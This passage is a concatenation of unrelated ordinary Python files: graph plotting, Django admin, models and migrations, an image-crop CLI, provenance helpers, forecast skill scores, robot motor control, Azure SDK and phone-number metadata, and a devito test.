        axes._axis3don = False  # hide the 3d axis lines entirely

        _plot_3d_subplot(graph, request, prog, axes)

    fig.tight_layout()
    if filename is not None:
        plt.savefig(filename)
    else:
        plt.show()
    plt.close()


def _plot_3d_subplot(graph, request, prog, axes):
    """
    Plot a single candidate graph in 3d.

    The container (the candidate graph minus the request nodes) is laid
    out at z=0; each request node floats at z=SPACE above the container
    node it is stitched to, jittered when two would overlap.

    :param graph: candidate graph (container plus request nodes).
    :param request: graph holding the newly requested nodes.
    :param prog: graphviz layout program name.
    :param axes: 3d axes to draw on.
    """
    cache = {}

    # Lay out only the container: drop the request nodes from a copy.
    tmp = graph.copy()
    for node in request.nodes():
        tmp.remove_node(node)

    pos = nx.nx_agraph.graphviz_layout(tmp, prog=prog)

    # the container
    for item in tmp.nodes():
        axes.plot([pos[item][0]], [pos[item][1]], [0], linestyle="None",
                  marker="o", color='gray')
        axes.text(pos[item][0], pos[item][1], 0, item)

    for src, trg in tmp.edges():
        axes.plot([pos[src][0], pos[trg][0]],
                  [pos[src][1], pos[trg][1]],
                  [0, 0], color='gray')

    # the new nodes
    for item in graph.nodes():
        if item in request.nodes():
            for nghb in graph.neighbors(item):
                if nghb in tmp.nodes():
                    x_val = pos[nghb][0]
                    y_val = pos[nghb][1]
                    if (x_val, y_val) in list(cache.values()):
                        # Jitter overlapping nodes apart. Fix: the y offset
                        # previously reused the x coordinate (pos[nghb][0])
                        # instead of the y coordinate.
                        x_val = pos[nghb][0] + random.randint(10, SPACE)
                        y_val = pos[nghb][1] + random.randint(10, SPACE)
                    cache[item] = (x_val, y_val)

                    # edge
                    axes.plot([x_val, pos[nghb][0]],
                              [y_val, pos[nghb][1]],
                              [SPACE, 0], color='blue')

            # NOTE(review): if a request node has no neighbour inside the
            # container, x_val/y_val carry over from the previous iteration
            # (or are undefined on the first) — confirm intended behaviour.
            axes.plot([x_val], [y_val], [SPACE], linestyle="None", marker="o",
                      color='blue')
            axes.text(x_val, y_val, SPACE, item)

    for src, trg in request.edges():
        if trg in cache and src in cache:
            axes.plot([cache[src][0], cache[trg][0]],
                      [cache[src][1], cache[trg][1]],
                      [SPACE, SPACE], color='blue')


def _get_size(n_items):
    """
    Calculate the size of the subplot layouts based on number of items.
    """
    n_cols = math.ceil(math.sqrt(n_items))
    n_rows = math.floor(math.sqrt(n_items))
    if n_cols * n_rows < n_items:
        n_cols += 1
    return int(n_rows), int(n_cols)

# -*- coding: utf-8 -*-

# django-simple-help
# simple_help/admin.py

from __future__ import unicode_literals

from django.contrib import admin

try:  # add modeltranslation
    from modeltranslation.translator import translator
    from modeltranslation.admin import TabbedDjangoJqueryTranslationAdmin
except ImportError:
    pass

from simple_help.models import PageHelp
from simple_help.forms import PageHelpAdminForm
from simple_help.utils import modeltranslation
try:
    from simple_help.translation import PageHelpTranslationOptions
except ImportError:
    pass


__all__ = [
    "PageHelpAdmin",
]


class PageHelpAdmin(TabbedDjangoJqueryTranslationAdmin if modeltranslation() else admin.ModelAdmin):
    """
    Customize PageHelp model for admin area.
    """

    # Columns shown in the change list.
    list_display = ["page", "title", ]
    # Admin search box matches against the help title.
    search_fields = ["title", ]
    list_filter = ["page", ]

    form = PageHelpAdminForm


if modeltranslation():
    # registering translation options
    # (translator/PageHelpTranslationOptions import only when
    # django-modeltranslation is installed — see the try/except imports)
    translator.register(PageHelp, PageHelpTranslationOptions)


# registering admin custom classes
admin.site.register(PageHelp, PageHelpAdmin)

# -*- coding: utf-8 -*-
import sys
from io import BytesIO
import argparse
from PIL import Image

from .api import crop_resize

# CLI definition; main() below consumes these arguments.
parser = argparse.ArgumentParser(
    description='crop and resize an image without aspect ratio distortion.')
parser.add_argument('image')
# '-w' and '-W' are aliases for width; height uses capital '-H' only,
# since lowercase '-h' is reserved for argparse's help flag.
parser.add_argument('-w', '-W', '--width', metavar='<width>', type=int,
                    help='desired width of image in pixels')
parser.add_argument('-H', '--height', metavar='<height>', type=int,
                    help='desired height of image in pixels')
parser.add_argument('-f', '--force', action='store_true',
                    help='whether to scale up for smaller images')
parser.add_argument('-d', '--display', action='store_true', default=False,
                    help='display the new image (don\'t write to file)')
parser.add_argument('-o', '--output', metavar='<file>',
                    help='Write output to <file> instead of stdout.')


def main():
    """Crop/resize the image named on the command line and emit the result.

    Output goes to a window (-d), a file (-o), or binary stdout.
    """
    args = parser.parse_args()
    source = Image.open(args.image)
    target = (args.width, args.height)
    result = crop_resize(source, target, args.force)

    if args.display:
        result.show()
        return
    if args.output:
        result.save(args.output)
        return

    # No destination given: encode in the source format and stream to stdout.
    buffer = BytesIO()
    result.save(buffer, source.format)
    try:
        out = sys.stdout.buffer  # Python 3: binary stdout
    except AttributeError:
        out = sys.stdout  # Python 2 fallback
    out.write(buffer.getvalue())

from __future__ import print_function
import os
import sys
import subprocess

# Optional dependencies are probed with guarded imports; availability is
# recorded in module flags instead of failing at import time.
# BUG FIX: pkg_resources was previously ALSO imported unconditionally
# before this guard, so a missing package raised ImportError before the
# flag could ever be set to False.  The bare ``except:`` clauses are
# narrowed to ImportError so real errors are no longer swallowed.
try:
    import pkg_resources
    _has_pkg_resources = True
except ImportError:
    _has_pkg_resources = False

try:
    import svn.local
    _has_svn_local = True
except ImportError:
    _has_svn_local = False
    
def test_helper():
    """Return a fixed string used to exercise the helper plumbing."""
    message = "test helper text"
    return message

def dict_to_str(d):
    """
    Render dictionary *d* as text: one 'key: value' entry per line,
    entries separated by newlines.
    """
    return '\n'.join('{}: {}'.format(key, d[key]) for key in d)

def module_version(module, label=None):
    """
    Look up the installed version of *module* via pkg_resources.

    Returns a one-entry dict mapping *label* (when given) or the default
    key '<module> version' to the version string.  Returns an empty dict
    when pkg_resources is unavailable.
    """
    if not _has_pkg_resources:
        return {}
    version = pkg_resources.get_distribution(module).version
    key = '{}'.format(label) if label else '{} version'.format(module)
    return {key: '{}'.format(version)}

def file_contents(filename, label=None):
    """
    Helper function for getting the contents of a file,
    provided the filename.

    Returns a dictionary keyed (by default) with the filename
    where the value is a string containing the contents of the file.
    Returns an empty dict (after printing an error) when the file
    does not exist.

    The optional argument 'label' allows you to set the
    string used as the dictionary key in the returned dictionary.
    """
    if not os.path.isfile(filename):
        print('ERROR: {} NOT FOUND.'.format(filename))
        return {}
    # Use a context manager so the handle is always closed (the previous
    # version leaked the file object) and read in one call instead of
    # concatenating line by line.
    with open(filename, 'r') as fin:
        contents = fin.read()
    key = '{}'.format(label) if label else filename
    return {key: contents}

def svn_information(svndir=None, label=None):
    """
    Helper function for obtaining the SVN repository
    information for the current directory (default)
    or the directory supplied in the svndir argument.

    Returns a dictionary keyed (by default) as 'SVN INFO'
    where the value is a string containing essentially what
    is returned by 'svn info'.  Returns an empty dict when the
    svn package is missing or the directory is not a working copy.

    The optional argument 'label' allows you to set the
    string used as the dictionary key in the returned dictionary.
    """
    if not _has_svn_local:
        print('SVN information unavailable.')
        print('You do not have the "svn" package installed.')
        print('Install "svn" from pip using "pip install svn"')
        return {}
    repo = svn.local.LocalClient(svndir if svndir else os.getcwd())
    try:
        # Get a dictionary of the SVN repository information.
        info = repo.info()
    except Exception:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt and
        # SystemExit are no longer swallowed.
        print('ERROR: WORKING DIRECTORY NOT AN SVN REPOSITORY.')
        return {}
    key = '{}'.format(label) if label else 'SVN INFO'
    return {key: dict_to_str(info)}

def get_git_hash(gitpath=None, label=None):
    """
    Helper function for obtaining the git repository HEAD hash
    for the current directory (default) or the directory supplied
    in the gitpath argument.

    Returns a dictionary keyed (by default) as 'GIT HASH' where the
    value is the raw ``git rev-parse HEAD`` output (bytes on Python 3,
    as before).  Returns an empty dict when the directory is not a
    git repository.

    The optional argument 'label' allows you to set the string
    used as the dictionary key in the returned dictionary.
    """
    thisdir = None
    if gitpath:
        # Remember the current directory so it can be restored.
        # BUG FIX: the previous version saved it but never chdir'd
        # back, permanently leaking the cwd change to the caller.
        thisdir = os.getcwd()
        os.chdir(gitpath)
    try:
        sha = subprocess.check_output(['git', 'rev-parse', 'HEAD'],
                                      shell=False).strip()
    except subprocess.CalledProcessError:
        print("ERROR: WORKING DIRECTORY NOT A GIT REPOSITORY")
        return {}
    finally:
        if thisdir is not None:
            os.chdir(thisdir)

    key = '{}'.format(label) if label else 'GIT HASH'
    return {key: sha}

def get_source_code(scode, sourcepath=None, label=None):
    """
    Helper function for obtaining the source code from the current
    directory (default) or the directory supplied in the sourcepath
    argument.

    Returns a dictionary keyed (by default) as 'source code'
    where the value is a string containing the source code.
    Returns an empty dict (after printing an error) when the file
    does not exist.

    The optional argument 'label' allows you to set the string
    used as the dictionary key in the returned dictionary.
    """
    thisdir = os.getcwd()
    if sourcepath:
        os.chdir(sourcepath)
    try:
        if not os.path.isfile(scode):
            print('ERROR: {} NOT FOUND.'.format(scode))
            return {}
        with open(scode, 'r') as f:
            source = f.read()
    finally:
        # BUG FIX: the previous version chdir'd permanently, leaking the
        # working-directory change to the caller.
        os.chdir(thisdir)
    key = '{}'.format(label) if label else 'source code'
    return {key: source}
            

from django.db import models

from .workflow import TestStateMachine


class TestModel(models.Model):
    """Model used to exercise the TestStateMachine workflow."""

    name = models.CharField(max_length=100)
    # Current workflow state name -- presumably managed by
    # TestStateMachine; TODO confirm against the workflow module.
    state = models.CharField(max_length=20, null=True, blank=True)
    # Numeric counterpart of the state.
    state_num = models.IntegerField(null=True, blank=True)
    # Secondary state slot used by tests.
    other_state = models.CharField(max_length=20, null=True, blank=True)
    message = models.CharField(max_length=250, null=True, blank=True)

    class Meta:
        # Permissions are generated from the state machine's transitions.
        permissions = TestStateMachine.get_permissions('testmodel', 'Test')


# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):
    """Add the sapelli_fingerprint integer field to SapelliProject."""

    dependencies = [
        ('geokey_sapelli', '0005_sapellifield_truefalse'),
    ]

    operations = [
        migrations.AddField(
            model_name='sapelliproject',
            name='sapelli_fingerprint',
            # -1 backfills existing rows; preserve_default=False means the
            # field has no default afterwards.
            field=models.IntegerField(default=-1),
            preserve_default=False,
        ),
    ]


from __future__ import division, print_function #, unicode_literals

"""
Multiples of 3 and 5

If we list all the natural numbers below 10 that are multiples
of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.

Find the sum of all the multiples of 3 or 5 below 1000.
"""

import numpy as np

# Problem parameters.

num_max = 1000

basis = [3, 5]

# Every i in [0, num_max) divisible by at least one basis value; each
# qualifying number appears exactly once.
factors = [i for i in range(num_max) if any(i % k == 0 for k in basis)]

print('\nRange: {:d}'.format(num_max))
print('Number of factors: {:d}'.format(len(factors)))
print('The answer: {:d}'.format(np.sum(factors)))

# Done.


s = "the     quick brown fox jumped over the lazy dog"

# Split on a single space: runs of spaces produce empty strings.
t = s.split(" ")
for word in t:
    print(word)

# Split on the letter "e".
r = s.split("e")
for piece in r:
    print(piece)

# Whitespace split: consecutive spaces collapse, no empty strings.
x = s.split()
for token in x:
    print(token)

# 2-arg version of split not supported
# y = s.split(" ",7)
# for v in y:
#     print v

import torch
from hypergan.train_hooks.base_train_hook import BaseTrainHook

class NegativeMomentumTrainHook(BaseTrainHook):
    """Train hook applying negative momentum to D and G gradients.

    Each call mixes the incoming gradients with those from the previous
    call: g' = g - gamma * g_prev, with gamma read from the hook config.
    """

    def __init__(self, gan=None, config=None, trainer=None):
        super().__init__(config=config, gan=gan, trainer=trainer)
        # Previous-step gradients; lazily initialised to zeros on the
        # first gradients() call.
        self.d_grads = None
        self.g_grads = None

    def gradients(self, d_grads, g_grads):
        if self.d_grads is None:
            self.d_grads = [torch.zeros_like(g) for g in d_grads]
            self.g_grads = [torch.zeros_like(g) for g in g_grads]

        # Snapshot the incoming gradients before mixing so the next call
        # sees the unmodified values.
        saved_d = [g.clone() for g in d_grads]
        saved_g = [g.clone() for g in g_grads]

        gamma = self.config.gamma
        mixed_d = [cur - gamma * prev for cur, prev in zip(d_grads, self.d_grads)]
        mixed_g = [cur - gamma * prev for cur, prev in zip(g_grads, self.g_grads)]

        self.d_grads = saved_d
        self.g_grads = saved_g
        return [mixed_d, mixed_g]

import numpy as np

__author__ = 'David John Gagne <djgagne@ou.edu>'


def main():
    """Print Peirce and Gerrity scores for Wilks (2011) Table 8.3."""
    # Contingency Table from Wilks (2011) Table 8.3
    counts = np.array([[50, 91, 71],
                       [47, 2364, 170],
                       [54, 205, 3288]])
    labels = np.arange(counts.shape[0]).astype(str)
    mct = MulticlassContingencyTable(counts,
                                     n_classes=counts.shape[0],
                                     class_names=labels)
    print(mct.peirce_skill_score())
    print(mct.gerrity_score())


class MulticlassContingencyTable(object):
    """
    This class is a container for a contingency table containing more than 2 classes.
    The contingency table is stored in table as a numpy array with the rows corresponding to forecast categories,
    and the columns corresponding to observation categories.
    """

    def __init__(self, table=None, n_classes=2, class_names=("1", "0")):
        # table: (n_classes, n_classes) count matrix; when omitted, an
        # all-zero integer matrix is created.
        self.table = table
        self.n_classes = n_classes
        self.class_names = class_names
        if table is None:
            self.table = np.zeros((self.n_classes, self.n_classes), dtype=int)

    def __add__(self, other):
        # Element-wise sum of counts; class metadata is taken from self.
        assert self.n_classes == other.n_classes, "Number of classes does not match"
        return MulticlassContingencyTable(self.table + other.table,
                                          n_classes=self.n_classes,
                                          class_names=self.class_names)

    def peirce_skill_score(self):
        """
        Multiclass Peirce Skill Score (also Hanssen and Kuipers score, True Skill Score)
        """
        n = float(self.table.sum())          # total number of cases
        nf = self.table.sum(axis=1)          # forecast marginals (rows)
        no = self.table.sum(axis=0)          # observation marginals (columns)
        correct = float(self.table.trace())  # number of correct forecasts
        return (correct / n - (nf * no).sum() / n ** 2) / (1 - (no * no).sum() / n ** 2)

    def gerrity_score(self):
        """
        Gerrity Score, which weights each cell in the contingency table by its observed relative frequency.
        :return:
        """
        k = self.table.shape[0]
        n = float(self.table.sum())
        p_o = self.table.sum(axis=0) / n     # observed class frequencies
        p_sum = np.cumsum(p_o)[:-1]          # cumulative frequencies (first k-1)
        a = (1.0 - p_sum) / p_sum
        s = np.zeros(self.table.shape, dtype=float)
        # NOTE: np.ndindex iterates in row-major order, so for i > j the
        # mirrored entry s[j, i] has already been filled when it is read.
        for (i, j) in np.ndindex(*s.shape):
            if i == j:
                s[i, j] = 1.0 / (k - 1.0) * (np.sum(1.0 / a[0:j]) + np.sum(a[j:k - 1]))
            elif i < j:
                s[i, j] = 1.0 / (k - 1.0) * (np.sum(1.0 / a[0:i]) - (j - i) + np.sum(a[j:k - 1]))
            else:
                s[i, j] = s[j, i]
        return np.sum(self.table / float(self.table.sum()) * s)

    def heidke_skill_score(self):
        """Multiclass Heidke Skill Score: accuracy relative to random chance."""
        n = float(self.table.sum())
        nf = self.table.sum(axis=1)
        no = self.table.sum(axis=0)
        correct = float(self.table.trace())
        return (correct / n - (nf * no).sum() / n ** 2) / (1 - (nf * no).sum() / n ** 2)


if __name__ == "__main__":
    # Run the Wilks Table 8.3 example when executed as a script.
    main()

from django.contrib.admin.models import LogEntry
from django.contrib.auth.models import User, Group, Permission
from simple_history import register

from celsius.tools import register_for_permission_handling

# Track change history (simple_history) for the auth models.
register(User)
register(Group)

# Enable celsius permission handling for these models.
register_for_permission_handling(User)
register_for_permission_handling(Group)
register_for_permission_handling(Permission)
register_for_permission_handling(LogEntry)

from django import forms
from miniURL.models import Redirection


# Build a form from a model.  (NB: different base class than a plain Form.)
class RedirectionForm(forms.ModelForm):
    """ModelForm exposing the real_url and pseudo fields of Redirection."""

    class Meta:
        model = Redirection
        fields = ('real_url', 'pseudo')

# To populate the form, data can come from a POST
# or directly from a model instance:
#form = ArticleForm(instance=article)  # article being any Article object from the database
# The fields are then pre-filled.

# Once a valid ModelForm has been received, calling save() writes it to the database.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 25 21:11:45 2017

@author: hubert
"""

import numpy as np
import matplotlib.pyplot as plt


class LiveBarGraph(object):
    """Live-updating bar graph with one bar per (band, channel) pair."""

    def __init__(self, band_names=['delta', 'theta', 'alpha', 'beta'],
                 ch_names=['TP9', 'AF7', 'AF8', 'TP10']):
        """Create the figure with one zero-height bar per combination.

        NOTE(review): the mutable default arguments are kept for
        interface compatibility; they are never mutated here.
        """
        self.band_names = band_names
        self.ch_names = ch_names
        # BUG FIX: the original multiplied the two *lists* (a TypeError)
        # and left a dangling ``self.x =`` (a SyntaxError).  The number
        # of bars is the number of (band, channel) combinations.
        self.n_bars = len(self.band_names) * len(self.ch_names)

        self.fig, self.ax = plt.subplots()
        self.ax.set_ylim((0, 1))

        y = np.zeros((self.n_bars,))
        x = range(self.n_bars)

        self.rects = self.ax.bar(x, y)

    def update(self, new_y):
        """Set bar heights from new_y; extra values are ignored by zip."""
        [rect.set_height(y) for rect, y in zip(self.rects, new_y)]


if __name__ == '__main__':

    bar = LiveBarGraph()
    plt.show()

    # Animate forever with random heights (Ctrl-C to stop).
    while True:
        bar.update(np.random.random(10))
        plt.pause(0.1)






# -*- coding: utf-8 -*-
from modules import Robot
import time

r = Robot.Robot()
# Target positions for the three operating modes -- units unclear from
# here; TODO confirm against Robot.changestate.
state = [0, 1000, 1500]
# Operating modes: run (drive), move, write.
(run, move, write) = range(3)
i = run
# Speed divisor: 1 = full speed, larger values slow the motors down.
slowdown = 1
# Latched motion direction for the one-click controls (-1, 0, 1).
flag_A = 0
flag_C = 0
# Per-control cooldown counters, decremented once per loop pass.
lock = [0, 0, 0, 0]

while(True):
    a = r.Read()
    # Tick down the cooldown counters once per pass.
    for it in range(len(lock)):
        if lock[it]:
            lock[it] = lock[it] - 1

    if a[0]:                                        # continuous control
        flag_A = 0
        flag_C = 0
        if a[0] == 1 or a[0] == 5 or a[0] == 6:
            r.A.run_forever(r.S/slowdown)
        elif a[0] == 2 or a[0] == 7 or a[0] == 8:
            r.A.run_forever(-r.S/slowdown)
        else:
            r.A.stop()
        if a[0] == 3 or a[0] == 5 or a[0] == 7:
            r.C.run_forever(r.S/slowdown)
        elif a[0] == 4 or a[0] == 6 or a[0] == 8:
            r.C.run_forever(-r.S/slowdown)
        else:
            r.C.stop()

    elif a[1] and not lock[1]:                      # left control: discrete
        # BUG FIX: mode comparisons use ==/!= instead of ``is``/``is not``;
        # identity checks on ints rely on interpreter caching.
        if a[1] == 1 and i != run:                  # right control: continuous
            r.changestate(state[i]-state[i-1])
            i = i-1
            time.sleep(0.5)                         # (state[i]-state[i-1])/r.S
            if i == run:
                slowdown = 1
        elif a[1] == 2 and i != write:
            r.changestate(state[i]-state[i+1])
            i = i+1
            slowdown = 5
            time.sleep(0.5)                         # (state[i+1]-state[i])/r.S
        elif a[1] == 3:
            r.B.run_forever(r.S)
        elif a[1] == 4:
            r.B.run_forever(-r.S)
        elif a[1] == 9:
            # BUG FIX: this line was indented with a tab, which is a
            # TabError under Python 3.
            r.B.stop()
        else:
            pass

    elif a[2]:                                      # one-click control
        if a[2] == 1 or a[2] == 5 or a[2] == 6:     # stop on 9 (beacon)
            if flag_A == -1:
                r.A.stop()
                flag_A = 0
                lock[0] = 30                        # lock = 30
            elif not lock[0]:
                r.A.run_forever(r.S/slowdown)
                flag_A = 1
        elif a[2] == 2 or a[2] == 7 or a[2] == 8:
            if flag_A == 1:
                r.A.stop()
                flag_A = 0
                lock[1] = 30                        # lock = 30
            elif not lock[1]:
                r.A.run_forever(-r.S/slowdown)
                flag_A = -1
        if a[2] == 3 or a[2] == 5 or a[2] == 7:
            if flag_C == -1:
                r.C.stop()
                flag_C = 0
                lock[2] = 30                        # lock = 30
            elif not lock[2]:
                r.C.run_forever(r.S/slowdown)
                flag_C = 1
        elif a[2] == 4 or a[2] == 6 or a[2] == 8:
            if flag_C == 1:
                # BUG FIX: ``r.C.stop`` was missing its call parentheses,
                # so the motor was never actually stopped on this branch.
                r.C.stop()
                flag_C = 0
                lock[3] = 30                        # lock = 30
            elif not lock[3]:
                r.C.run_forever(-r.S/slowdown)
                flag_C = -1
        if a[2] == 9:
            r.stop()
            flag_A = 0
            flag_C = 0

    elif a[3]:                                      # alternative one-click
        if a[3] == 1:                               # button 1 - both motors
            if flag_A == -1 and flag_C == -1:
                r.stop()
                flag_A = 0
                flag_C = 0
                lock[0] = 30                        # lock = 30
            elif not lock[0]:
                r.run(r.S/slowdown, r.S/slowdown)
                flag_A = 1
                flag_C = 1
        elif a[3] == 2:
            if flag_A == 1 and flag_C == 1:
                r.stop()
                flag_A = 0
                flag_C = 0
                lock[1] = 30                        # lock = 30
            elif not lock[1]:
                r.run(-r.S/slowdown, -r.S/slowdown)
                flag_A = -1
                flag_C = -1
        elif a[3] == 3:
            if flag_A == 1 and flag_C == -1:
                r.stop()
                flag_A = 0
                flag_C = 0
                lock[2] = 30                        # lock = 30
            elif not lock[2]:
                r.run(-r.S/slowdown, r.S/slowdown)
                flag_A = -1
                flag_C = 1
        elif a[3] == 4:
            if flag_A == -1 and flag_C == 1:
                r.stop()
                flag_A = 0
                flag_C = 0
                lock[3] = 30                        # lock = 30
            elif not lock[3]:
                r.run(r.S/slowdown, -r.S/slowdown)
                flag_A = 1
                flag_C = -1
        elif a[3] == 9:
            r.stop()
            flag_A = 0
            flag_C = 0
    else:
        # No input: stop any motor that is not latched on.
        if not flag_A:
            r.A.stop()
        if not flag_C:
            r.C.stop()


# -*- coding: utf-8 -*-

from django.db import models
from Corretor.base import CorretorException
from Corretor.base import ExecutorException
from Corretor.base import CompiladorException
from Corretor.base import ComparadorException
from Corretor.base import LockException
from model_utils import Choices


class RetornoCorrecao(models.Model):
    """Model holding the outcome of grading a question (or exam question).
    """
    # Possible outcomes of a grading run; stored as the small integer.
    TIPOS = Choices(
                       (0,'loading',u'Loading'),
                       (1,'compilacao',u'Compilação'),
                       (2,'execucao',u'Execução'),
                       (3,'comparacao',u'Comparação'),
                       (4,'lock',u'Lock'),
                       (5,'correto',u'Correto'),
                   )
    tipo =  models.SmallIntegerField(u"Tipo",choices=TIPOS, default=TIPOS.loading)
    msg = models.TextField(u"Mensagem",blank=True,null=True)
    # Celery task id of the grading run, when available.
    task_id = models.CharField(max_length=350,blank=True,null=True)
    class Meta:
        verbose_name = u'Retorno Correção'
        app_label = 'Corretor'


    def __unicode__(self):
        return "%s: %s" %(self.TIPOS[self.tipo][1],self.msg)

    def altera_dados(self,sucesso=True,erroException=None):
        """
        Update this record either with the details taken from
        erroException or with the success message.
        """

        tipo = RetornoCorrecao.TIPOS.correto
        correcao_msg = "Correto!"
        # print ">>altera_dados"
        # print ">>isinstance(erroException,CorretorException)",isinstance(erroException,CorretorException)

        if sucesso == True:
            # print ">>retorno.successful()"
            tipo = RetornoCorrecao.TIPOS.correto
            correcao_msg = "Correto!"
        elif isinstance(erroException,CorretorException):
            # print "erro: %s" % erroException.message
            # Map the exception type to its outcome; when the exception
            # matches several types the later checks win.
            if isinstance(erroException,ExecutorException):
                correcao_msg = erroException.message
                tipo = RetornoCorrecao.TIPOS.execucao
            if isinstance(erroException,CompiladorException):
                correcao_msg = erroException.message
                tipo = RetornoCorrecao.TIPOS.compilacao
            if isinstance(erroException,ComparadorException):
                correcao_msg = erroException.message
                tipo = RetornoCorrecao.TIPOS.comparacao
            if isinstance(erroException,LockException):
                correcao_msg = erroException.message
                tipo = RetornoCorrecao.TIPOS.lock

        self.tipo = tipo
        self.msg = correcao_msg

# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------

from .sub_resource import SubResource


class ApplicationGatewaySslPredefinedPolicy(SubResource):
    """An Ssl predefined policy.

    :param id: Resource ID.
    :type id: str
    :param name: Name of Ssl predefined policy.
    :type name: str
    :param cipher_suites: Ssl cipher suites to be enabled in the specified
     order for application gateway.
    :type cipher_suites: list[str or
     ~azure.mgmt.network.v2017_10_01.models.ApplicationGatewaySslCipherSuite]
    :param min_protocol_version: Minimum version of Ssl protocol to be
     supported on application gateway. Possible values include: 'TLSv1_0',
     'TLSv1_1', 'TLSv1_2'
    :type min_protocol_version: str or
     ~azure.mgmt.network.v2017_10_01.models.ApplicationGatewaySslProtocol
    """

    # Maps attribute names to their wire-format keys and types.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'cipher_suites': {'key': 'properties.cipherSuites', 'type': '[str]'},
        'min_protocol_version': {'key': 'properties.minProtocolVersion', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # 'id' is presumably handled by the SubResource base -- the base
        # __init__ receives all kwargs; confirm if editing by hand (this
        # file is AutoRest-generated).
        super(ApplicationGatewaySslPredefinedPolicy, self).__init__(**kwargs)
        self.name = kwargs.get('name', None)
        self.cipher_suites = kwargs.get('cipher_suites', None)
        self.min_protocol_version = kwargs.get('min_protocol_version', None)

from util.tipo import tipo
class S_PARTY_MEMBER_INTERVAL_POS_UPDATE(object):
    """Packet handler stub: logs the packet name, payload size and hex dump."""

    def __init__(self, tracker, time, direction, opcode, data):
        # str(type(self)).split('.')[3] extracts the class name from the
        # qualified name -- fragile if the package depth changes
        # (NOTE(review): type(self).__name__ would be the robust form).
        print(str(type(self)).split('.')[3]+'('+str(len(data))+'): '+ str(data.get_array_hex(1))[1:-1])

"""Auto-generated file, do not edit by hand. BG metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata

# Numbering-plan metadata for Bulgaria (BG, +359).  Auto-generated: fix
# issues in the generator/source data, not in this literal.
PHONE_METADATA_BG = PhoneMetadata(id='BG', country_code=359, international_prefix='00',
    general_desc=PhoneNumberDesc(national_number_pattern='[23567]\\d{5,7}|[489]\\d{6,8}', possible_number_pattern='\\d{5,9}'),
    fixed_line=PhoneNumberDesc(national_number_pattern='2(?:[0-8]\\d{5,6}|9\\d{4,6})|(?:[36]\\d|5[1-9]|8[1-6]|9[1-7])\\d{5,6}|(?:4(?:[124-7]\\d|3[1-6])|7(?:0[1-9]|[1-9]\\d))\\d{4,5}', possible_number_pattern='\\d{5,8}', example_number='2123456'),
    mobile=PhoneNumberDesc(national_number_pattern='(?:8[7-9]|98)\\d{7}|4(?:3[0789]|8\\d)\\d{5}', possible_number_pattern='\\d{8,9}', example_number='48123456'),
    toll_free=PhoneNumberDesc(national_number_pattern='800\\d{5}', possible_number_pattern='\\d{8}', example_number='80012345'),
    premium_rate=PhoneNumberDesc(national_number_pattern='90\\d{6}', possible_number_pattern='\\d{8}', example_number='90123456'),
    shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    personal_number=PhoneNumberDesc(national_number_pattern='700\\d{5}', possible_number_pattern='\\d{5,9}', example_number='70012345'),
    voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    emergency=PhoneNumberDesc(national_number_pattern='1(?:12|50|6[06])', possible_number_pattern='\\d{3}', example_number='112'),
    voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    short_code=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    standard_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    national_prefix='0',
    national_prefix_for_parsing='0',
    number_format=[NumberFormat(pattern='(2)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['29'], national_prefix_formatting_rule='0\\1'),
        NumberFormat(pattern='(2)(\\d{3})(\\d{3,4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='0\\1'),
        NumberFormat(pattern='(\\d{3})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['43[124-7]|70[1-9]'], national_prefix_formatting_rule='0\\1'),
        NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{2})', format='\\1 \\2 \\3', leading_digits_pattern=['43[124-7]|70[1-9]'], national_prefix_formatting_rule='0\\1'),
        NumberFormat(pattern='(\\d{3})(\\d{2})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['[78]00'], national_prefix_formatting_rule='0\\1'),
        NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{2,3})', format='\\1 \\2 \\3', leading_digits_pattern=['[356]|4[124-7]|7[1-9]|8[1-6]|9[1-7]'], national_prefix_formatting_rule='0\\1'),
        NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{3,4})', format='\\1 \\2 \\3', leading_digits_pattern=['48|8[7-9]|9[08]'], national_prefix_formatting_rule='0\\1')])

from itertools import product

import numpy as np
from sympy import And
import pytest

from conftest import skipif, opts_tiling
from devito import (ConditionalDimension, Grid, Function, TimeFunction, SparseFunction,  # noqa
                    Eq, Operator, Constant, Dimension, SubDimension, switchconfig,
                    SubDomain, Lt, Le, Gt, Ge, Ne, Buffer)
from devito.ir.iet import (Conditional, Expression, Iteration, FindNodes,
                           retrieve_iteration_tree)
from devito.symbolics import indexify, retrieve_functions, IntDiv
from devito.types import Array


class TestBufferedDimension(object):
    """Tests for TimeFunction storage backed by a fixed-size Buffer."""

    def test_multi_buffer(self):
        # Two TimeFunctions driven by one Operator: f with the default
        # time buffer, g saving into a 7-slot Buffer.
        grid = Grid((3, 3))
        f = TimeFunction(name="f", grid=grid)
        g = TimeFunction(name="g", grid=grid, save=Buffer(7))

        op = Operator([Eq(f.forward, 1), Eq(g, f.forward)])
        op(time_M=3)
        # f looped all time_order buffer and is 1 everywhere
